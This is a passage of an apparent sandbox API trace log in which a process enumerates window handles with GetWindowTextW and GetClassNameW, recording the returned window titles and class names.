[0131.315] GetClassNameW (in: hWnd=0x10260, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="weapon_Natural_win") returned 18 [0131.315] GetWindowTextW (in: hWnd=0x10266, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Camera") returned 6 [0131.316] GetClassNameW (in: hWnd=0x10266, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Camerawindow") returned 12 [0131.316] GetWindowTextW (in: hWnd=0x10262, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nothing Foreign") returned 15 [0131.316] GetClassNameW (in: hWnd=0x10262, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nothing_Foreign_app") returned 19 [0131.316] GetWindowTextW (in: hWnd=0x10264, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Move") returned 4 [0131.316] GetClassNameW (in: hWnd=0x10264, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="movecls") returned 7 [0131.316] GetWindowTextW (in: hWnd=0x40200, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Arrive") returned 6 [0131.317] GetClassNameW (in: hWnd=0x40200, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="arrivewnd") returned 9 [0131.317] GetWindowTextW (in: hWnd=0x1025c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Throw Toward Purpose") returned 20 [0131.317] GetClassNameW (in: hWnd=0x1025c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="throwTowardPurposeclass") returned 23 [0131.317] GetWindowTextW (in: hWnd=0x10244, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Factor Western Forget") returned 21 [0131.317] GetClassNameW (in: hWnd=0x10244, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="factor_Western_forget_window") returned 28 [0131.318] GetWindowTextW (in: hWnd=0x1022e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Clear") returned 5 [0131.318] GetClassNameW (in: hWnd=0x1022e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Clear_app") returned 9 [0131.318] GetWindowTextW (in: hWnd=0x10222, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Watch") returned 5 [0131.318] GetClassNameW (in: hWnd=0x10222, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Watch") returned 5 [0131.318] GetWindowTextW (in: hWnd=0x10230, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Who South") returned 9 [0131.318] GetClassNameW (in: hWnd=0x10230, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whosouthapp") returned 11 [0131.318] GetWindowTextW (in: hWnd=0x10226, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Raise Left Buy") returned 14 [0131.319] GetClassNameW (in: hWnd=0x10226, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="raiseLeftbuyclass") returned 17 [0131.319] GetWindowTextW (in: hWnd=0x10218, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Knowledge Sign") returned 14 [0131.319] GetClassNameW (in: hWnd=0x10218, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Knowledgesignwin") returned 16 [0131.319] GetWindowTextW (in: hWnd=0x1020e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drop") returned 4 [0131.319] GetClassNameW (in: hWnd=0x1020e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dropwindow") returned 10 [0131.319] GetWindowTextW (in: hWnd=0x1020c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="That But") returned 8 [0131.320] GetClassNameW (in: hWnd=0x1020c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="that_but_class") returned 14 [0131.320] GetWindowTextW (in: hWnd=0x10206, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Claim") returned 5 [0131.320] GetClassNameW (in: hWnd=0x10206, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="claim_wnd") returned 9 [0131.320] GetWindowTextW (in: hWnd=0x10204, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Quite Do") returned 8 [0131.320] GetClassNameW (in: hWnd=0x10204, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Quite_Do_class") returned 14 [0131.320] GetWindowTextW (in: hWnd=0x30122, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.320] GetClassNameW (in: hWnd=0x30122, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.321] GetWindowTextW (in: hWnd=0x30036, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.321] GetClassNameW (in: hWnd=0x30036, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.321] GetWindowTextW (in: hWnd=0x3003e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.321] GetClassNameW (in: hWnd=0x3003e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.321] GetWindowTextW (in: hWnd=0x30070, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.321] GetClassNameW (in: hWnd=0x30070, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.321] GetWindowTextW (in: hWnd=0x201e0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0131.322] GetClassNameW (in: hWnd=0x201e0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0131.322] GetWindowTextW (in: hWnd=0x401f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.322] GetClassNameW (in: hWnd=0x401f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.322] GetWindowTextW (in: hWnd=0x30288, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.322] GetClassNameW (in: hWnd=0x30288, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.322] GetWindowTextW (in: hWnd=0x30126, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0131.323] GetClassNameW (in: hWnd=0x30126, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IEFrame") returned 7 [0131.323] GetWindowTextW (in: hWnd=0x2012c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.323] GetClassNameW (in: hWnd=0x2012c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0131.323] GetWindowTextW (in: hWnd=0x20084, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.323] GetClassNameW (in: hWnd=0x20084, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0131.323] GetWindowTextW (in: hWnd=0x301fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.324] GetClassNameW (in: hWnd=0x301fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.971] GetWindowTextW (in: hWnd=0x201fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.971] GetClassNameW (in: hWnd=0x201fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.971] GetWindowTextW (in: hWnd=0x101be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.972] GetClassNameW (in: hWnd=0x101be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0133.972] GetWindowTextW (in: hWnd=0x101b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.972] GetClassNameW (in: hWnd=0x101b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.972] GetWindowTextW (in: hWnd=0x101aa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Battery Meter") returned 13 [0133.972] GetClassNameW (in: hWnd=0x101aa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0133.973] GetWindowTextW (in: hWnd=0x101a6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.973] GetClassNameW (in: hWnd=0x101a6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.973] GetWindowTextW (in: hWnd=0x101a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0133.973] GetClassNameW (in: hWnd=0x101a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0133.974] GetWindowTextW (in: hWnd=0x1018e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Task Host Window") returned 16 [0133.974] GetClassNameW (in: hWnd=0x1018e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0133.974] GetWindowTextW (in: hWnd=0x10110, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.974] GetClassNameW (in: hWnd=0x10110, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.974] GetWindowTextW (in: hWnd=0x10118, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.974] GetClassNameW (in: hWnd=0x10118, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabletModeCoverWindow") returned 21 [0133.974] GetWindowTextW (in: hWnd=0x20152, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.975] GetClassNameW (in: hWnd=0x20152, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.975] GetWindowTextW (in: hWnd=0x1019a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.975] GetClassNameW (in: hWnd=0x1019a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.975] GetWindowTextW (in: hWnd=0x10116, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.975] GetClassNameW (in: hWnd=0x10116, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0133.976] GetWindowTextW (in: hWnd=0x1010e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.976] GetClassNameW (in: hWnd=0x1010e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0133.976] GetWindowTextW (in: hWnd=0x100f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.976] GetClassNameW (in: hWnd=0x100f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.977] GetWindowTextW (in: hWnd=0x100f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Push Notifications Platform") returned 35 [0133.977] GetClassNameW (in: hWnd=0x100f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0133.977] GetWindowTextW (in: hWnd=0x100ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0133.977] GetClassNameW (in: hWnd=0x100ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0133.977] GetWindowTextW (in: hWnd=0x100ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.978] GetClassNameW (in: hWnd=0x100ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0133.978] GetWindowTextW (in: hWnd=0x100e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.978] GetClassNameW (in: hWnd=0x100e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.978] GetWindowTextW (in: hWnd=0x100e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.978] GetClassNameW (in: hWnd=0x100e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.978] GetWindowTextW (in: hWnd=0x200da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.978] GetClassNameW (in: hWnd=0x200da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.979] GetWindowTextW (in: hWnd=0x100c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.979] GetClassNameW (in: hWnd=0x100c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0133.979] GetWindowTextW (in: hWnd=0x702b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.979] GetClassNameW (in: hWnd=0x702b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0133.980] GetWindowTextW (in: hWnd=0x20040, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MS_WebcheckMonitor") returned 18 [0133.980] GetClassNameW (in: hWnd=0x20040, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0133.980] GetWindowTextW (in: hWnd=0x2001c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="BluetoothNotificationAreaIconWindowClass") returned 40 [0133.980] GetClassNameW (in: hWnd=0x2001c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0133.980] GetWindowTextW (in: hWnd=0x20030, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Shell Experience Host") returned 29 [0133.980] GetClassNameW (in: hWnd=0x20030, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0133.980] GetWindowTextW (in: hWnd=0x2002e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.981] GetClassNameW (in: hWnd=0x2002e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0133.981] GetWindowTextW (in: hWnd=0x40038, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.982] GetClassNameW (in: hWnd=0x40038, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.983] GetWindowTextW (in: hWnd=0x101cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.983] GetClassNameW (in: hWnd=0x101cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.983] GetWindowTextW (in: hWnd=0x101c8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.983] GetClassNameW (in: hWnd=0x101c8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0133.983] GetWindowTextW (in: hWnd=0x100ac, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.983] GetClassNameW (in: hWnd=0x100ac, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0133.983] GetWindowTextW (in: hWnd=0x10078, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.984] GetClassNameW (in: hWnd=0x10078, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0133.984] GetWindowTextW (in: hWnd=0x10074, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.984] GetClassNameW (in: hWnd=0x10074, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0133.986] GetWindowTextW (in: hWnd=0x10022, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DWM Notification Window") returned 23 [0133.986] GetClassNameW (in: hWnd=0x10022, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0133.986] GetWindowTextW (in: hWnd=0x2002a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.986] GetClassNameW (in: hWnd=0x2002a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0133.986] GetWindowTextW (in: hWnd=0x3035e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0133.987] GetClassNameW (in: hWnd=0x3035e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0133.987] GetWindowTextW (in: hWnd=0x100d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Program Manager") returned 15 [0133.987] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0133.987] GetWindowTextW (in: hWnd=0x1012a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.987] GetClassNameW (in: hWnd=0x1012a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.988] GetWindowTextW (in: hWnd=0x100ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0133.988] GetClassNameW (in: hWnd=0x100ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0133.988] GetWindowTextW (in: hWnd=0x10082, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.988] GetClassNameW (in: hWnd=0x10082, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.988] GetWindowTextW (in: hWnd=0xb031c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.988] GetClassNameW (in: hWnd=0xb031c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.988] GetWindowTextW (in: hWnd=0x601d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.989] GetClassNameW (in: hWnd=0x601d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.989] GetWindowTextW (in: hWnd=0x103a0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.989] GetClassNameW (in: hWnd=0x103a0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.989] GetWindowTextW (in: hWnd=0x1039e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.989] GetClassNameW (in: hWnd=0x1039e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.990] GetWindowTextW (in: hWnd=0x1039c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.990] GetClassNameW (in: hWnd=0x1039c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.990] GetWindowTextW (in: hWnd=0x1039a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.990] GetClassNameW (in: hWnd=0x1039a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.990] GetWindowTextW (in: hWnd=0x20224, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.991] GetClassNameW (in: hWnd=0x20224, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.991] GetWindowTextW (in: hWnd=0x10398, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.991] GetClassNameW (in: hWnd=0x10398, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.991] GetWindowTextW (in: hWnd=0x10394, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.991] GetClassNameW (in: hWnd=0x10394, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.991] GetWindowTextW (in: hWnd=0x10392, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.991] GetClassNameW (in: hWnd=0x10392, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.992] GetWindowTextW (in: hWnd=0x10390, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.992] GetClassNameW (in: hWnd=0x10390, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.992] GetWindowTextW (in: hWnd=0x10388, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.992] GetClassNameW (in: hWnd=0x10388, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.992] GetWindowTextW (in: hWnd=0x10386, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.992] GetClassNameW (in: hWnd=0x10386, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.992] GetWindowTextW (in: hWnd=0x10384, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.992] GetClassNameW (in: hWnd=0x10384, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.993] GetWindowTextW (in: hWnd=0x10382, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.993] GetClassNameW (in: hWnd=0x10382, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.993] GetWindowTextW (in: hWnd=0x2021a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.993] GetClassNameW (in: hWnd=0x2021a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.993] GetWindowTextW (in: hWnd=0x10380, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.993] GetClassNameW (in: hWnd=0x10380, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.993] GetWindowTextW (in: hWnd=0x1037e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.993] GetClassNameW (in: hWnd=0x1037e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.994] GetWindowTextW (in: hWnd=0x1037c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.994] GetClassNameW (in: hWnd=0x1037c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.994] GetWindowTextW (in: hWnd=0x1037a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.994] GetClassNameW (in: hWnd=0x1037a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.994] GetWindowTextW (in: hWnd=0x10378, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.994] GetClassNameW (in: hWnd=0x10378, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.994] GetWindowTextW (in: hWnd=0x10376, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.994] GetClassNameW (in: hWnd=0x10376, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.995] GetWindowTextW (in: hWnd=0x10374, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.995] GetClassNameW (in: hWnd=0x10374, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.995] GetWindowTextW (in: hWnd=0x10372, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.995] GetClassNameW (in: hWnd=0x10372, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.995] GetWindowTextW (in: hWnd=0x10370, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.995] GetClassNameW (in: hWnd=0x10370, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.995] GetWindowTextW (in: hWnd=0x1036e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.996] GetClassNameW (in: hWnd=0x1036e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.996] GetWindowTextW (in: hWnd=0x1036c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.996] GetClassNameW (in: hWnd=0x1036c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.996] GetWindowTextW (in: hWnd=0x10368, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.996] GetClassNameW (in: hWnd=0x10368, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.996] GetWindowTextW (in: hWnd=0x10362, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.996] GetClassNameW (in: hWnd=0x10362, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.996] GetWindowTextW (in: hWnd=0x10360, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.997] GetClassNameW (in: hWnd=0x10360, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.997] GetWindowTextW (in: hWnd=0x1035a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.997] GetClassNameW (in: hWnd=0x1035a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.997] GetWindowTextW (in: hWnd=0x10358, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.997] GetClassNameW (in: hWnd=0x10358, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.997] GetWindowTextW (in: hWnd=0x10356, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.997] GetClassNameW (in: hWnd=0x10356, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.997] GetWindowTextW (in: hWnd=0x10354, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.998] GetClassNameW (in: hWnd=0x10354, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.998] GetWindowTextW (in: hWnd=0x10352, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.998] GetClassNameW (in: hWnd=0x10352, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.998] GetWindowTextW (in: hWnd=0x10350, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.998] GetClassNameW (in: hWnd=0x10350, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.998] GetWindowTextW (in: hWnd=0x1034e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.998] GetClassNameW (in: hWnd=0x1034e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.999] GetWindowTextW (in: hWnd=0x1034c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.999] GetClassNameW (in: hWnd=0x1034c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.999] GetWindowTextW (in: hWnd=0x1034a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.999] GetClassNameW (in: hWnd=0x1034a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.999] GetWindowTextW (in: hWnd=0x10348, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.999] GetClassNameW (in: hWnd=0x10348, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0133.999] GetWindowTextW (in: hWnd=0x10346, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0133.999] GetClassNameW (in: hWnd=0x10346, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.000] GetWindowTextW (in: hWnd=0x20216, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.000] GetClassNameW (in: hWnd=0x20216, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.000] GetWindowTextW (in: hWnd=0x1033c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.000] GetClassNameW (in: hWnd=0x1033c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.000] GetWindowTextW (in: hWnd=0x10334, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.000] GetClassNameW (in: hWnd=0x10334, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 